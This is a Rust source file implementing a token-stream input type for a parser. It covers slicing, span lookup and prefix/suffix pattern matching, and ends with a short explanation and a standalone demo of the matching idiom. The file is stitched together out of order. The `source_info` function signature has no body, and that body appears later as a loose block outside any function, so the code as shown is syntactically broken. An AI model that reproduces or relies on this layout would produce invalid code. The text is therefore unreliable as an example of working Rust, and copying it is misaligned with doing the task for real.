use crate::input::{Input, InputMatch, Range}; use crate::proc_macro::{flatten, FlatToken, FlatTokenPat, Span, TokenStream}; use indexing::{proof::Provable, Container, Index, Unknown}; use std::ops; impl Input for TokenStream { type Container = Vec<FlatToken>; type Slice = [FlatToken]; type SourceInfo = ops::Range<Span>; type SourceInfoPoint = Span; fn to_container(self) -> Self::Container { let mut out = vec![]; flatten(self, &mut out); out } fn slice<'b, 'i>( input: &'b Container<'i, Self::Container>, range: Range<'i>, ) -> &'b Self::Slice { &input[range.0] } fn source_info<'i>( input: &Container<'i, Self::Container>, range: Range<'i>, ) -> Self::SourceInfo
fn source_info_point<'i>( input: &Container<'i, Self::Container>, index: Index<'i, Unknown>, ) -> Self::SourceInfoPoint { // Try to get as much information as possible. let (before, after) = input.split_at(index); let before = &input[before]; let after = &input[after]; if let Some(first) = after.first() { first.span() } else if let Some(last) = before.last() { // Not correct but we're at the end of the input anyway. last.span() } else { // HACK(eddyb) last resort, make a span up // (a better option should exist) Span::call_site() } } } impl InputMatch<[FlatTokenPat<&'_ str>]> for [FlatToken] { fn match_left(&self, pat: &[FlatTokenPat<&str>]) -> Option<usize> { if self .iter() .zip(pat) .take_while(|(t, p)| t.matches_pat(p)) .count() == pat.len() { Some(pat.len()) } else { None } } fn match_right(&self, pat: &[FlatTokenPat<&str>]) -> Option<usize> { if self .iter() .zip(pat) .rev() .take_while(|(t, p)| t.matches_pat(p)) .count() == pat.len() { Some(pat.len()) } else { None } } }
{ // FIXME(eddyb) should be joining up spans, but the API // for that is still "semver-exempt" in `proc-macro2`. let last = range .nonempty() .map(|r| r.last().no_proof()) .unwrap_or(range.past_the_end()); Self::source_info_point(input, range.first())..Self::source_info_point(input, last) }
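The match_left/match_right implementations above rely on a zip + take_while count to decide whether the whole pattern lines up with the head (or tail) of the token slice. A small standalone analogue of that idiom, using plain equality in place of matches_pat, is sketched below purely as an illustration of the technique.

// Standalone analogue of the prefix-match idiom used by match_left:
// the pattern matches only if every one of its elements matches the
// corresponding element at the start of the slice.
fn match_left_eq<T: PartialEq>(slice: &[T], pat: &[T]) -> Option<usize> {
    if slice
        .iter()
        .zip(pat)
        .take_while(|(t, p)| t == p)
        .count()
        == pat.len()
    {
        Some(pat.len())
    } else {
        None
    }
}

fn main() {
    assert_eq!(match_left_eq(b"hello world", b"hello"), Some(5));
    assert_eq!(match_left_eq(b"hello", b"hello world"), None); // pattern longer than input
    assert_eq!(match_left_eq(b"hello", b"help"), None); // mismatch before the end of the pattern
}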